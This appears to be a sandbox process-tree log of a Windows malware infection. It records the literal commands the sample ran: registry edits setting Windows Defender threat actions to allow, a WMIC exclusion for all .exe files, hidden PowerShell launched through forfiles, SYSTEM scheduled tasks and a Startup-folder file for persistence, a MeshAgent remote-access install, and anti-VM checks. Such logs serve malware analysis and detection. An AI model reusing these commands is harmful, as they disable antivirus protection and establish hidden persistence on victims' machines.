C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:4804 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:4276
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
- Indirect Command Execution
PID:924 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:2448
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵
- System Location Discovery: System Language Discovery
PID:2108
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵
- Indirect Command Execution
PID:3716 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- System Location Discovery: System Language Discovery
PID:3596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3288 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bMRcrYTbxyvtsWXpEp" /SC once /ST 14:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe\" ag /pjwdidTEY 385121 /S" /V1 /F7⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:660
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:2920 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit2⤵
- Drops startup file
PID:532
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap4886:70:7zEvent17659 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2756 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff83d18cc40,0x7ff83d18cc4c,0x7ff83d18cc583⤵PID:4700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1836 /prefetch:23⤵PID:1324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2108 /prefetch:33⤵PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2320 /prefetch:83⤵PID:2252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:13⤵PID:5116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3284 /prefetch:13⤵PID:876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4536 /prefetch:13⤵PID:4516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4688,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4840 /prefetch:83⤵PID:1464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4340 /prefetch:83⤵PID:64
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3656,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5088 /prefetch:13⤵PID:1652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4700,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5172 /prefetch:13⤵PID:1132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3256,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3232 /prefetch:13⤵PID:5312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4616,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4620 /prefetch:13⤵PID:64
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5360,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4440 /prefetch:13⤵PID:5140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5496,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5512 /prefetch:13⤵PID:5476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4628,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3156 /prefetch:13⤵PID:6044
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3336 -ip 33361⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵
- Executes dropped EXE
PID:1584
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4036
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2800
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2320 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:860
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4880
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:3180
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:5500
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:5612
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5720
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1644
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:6088 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:5280
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:5340
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1212
-
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:5468
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:5716
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:3968
-
-
C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe ag /pjwdidTEY 385121 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5116
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:1212 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5348
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:5332
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:5420 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5440
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1388
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:5540 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5556
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5596
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:5580 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:5500 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:5604
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:5624 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5684 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5496
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5936 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:6016 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2868
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:6096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5444
-
-
